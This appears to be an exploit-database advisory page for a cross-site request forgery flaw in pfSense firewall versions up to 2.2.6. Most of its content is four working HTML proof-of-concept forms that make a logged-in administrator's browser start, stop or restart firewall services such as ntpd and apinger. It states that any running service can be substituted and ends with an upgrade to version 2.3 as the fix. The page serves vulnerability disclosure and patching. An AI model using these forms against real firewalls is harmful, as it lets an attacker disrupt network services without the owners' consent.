pfSense Firewall <= 2.2.6 Cross-Site Request Forgery

2016.04.15
Credit: Aatif Shahdad
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: pfSense Firewall <= 2.2.6 Cross-Site Request Forgery # Exploit Author: Aatif Shahdad # Software Link: http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz # Version: 2.2.6 and below. # Contact: https://twitter.com/61617469665f736 # Category: webapps 1. Description An attacker can coerce a logged-in victim's browser to issue requests that will start/stop/restart services on the Firewall. 2. Proof of Concept Login to the Web Console, for example, http://192.168.0.1 (set at the time of install) and open the following POC’s: Start NTPD service: <html> <body> <form action="https://192.168.0.1/status_services.php"> <input type="hidden" name="mode" value="startservice" /> <input type="hidden" name="service" value="ntpd" /> <input type="submit" value="Submit request" /> </form> </body> </html> Stop NTPD service: <html> <body> <form action="https://192.168.0.1/status_services.php"> <input type="hidden" name="mode" value="stopservice" /> <input type="hidden" name="service" value="ntpd" /> <input type="submit" value="Submit request" /> </form> </body> </html> Restart NTPD service: POC: <html> <body> <form action="https://192.168.0.1/status_services.php"> <input type="hidden" name="mode" value="restartservice" /> <input type="hidden" name="service" value="ntpd" /> <input type="submit" value="Submit request" /> </form> </body> </html> The service will automatically start/stop. Note: That NTPD service can be replaced with any service running on the Firewall. For example, to stop the APINGER (gateway monitoring daemon) service, use the following POC: <html> <body> <form action="https://192.168.0.1/status_services.php"> <input type="hidden" name="mode" value="stopservice" /> <input type="hidden" name="service" value="apinger" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3. Solution: Upgrade to version 2.3 at https://www.pfsense.org/download/mirror.php?section=downloads

References:

http://files.nyi.pfsense.org/mirror/downloads/old/pfSense-LiveCD-2.2.5-RELEASE-i386.iso.gz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top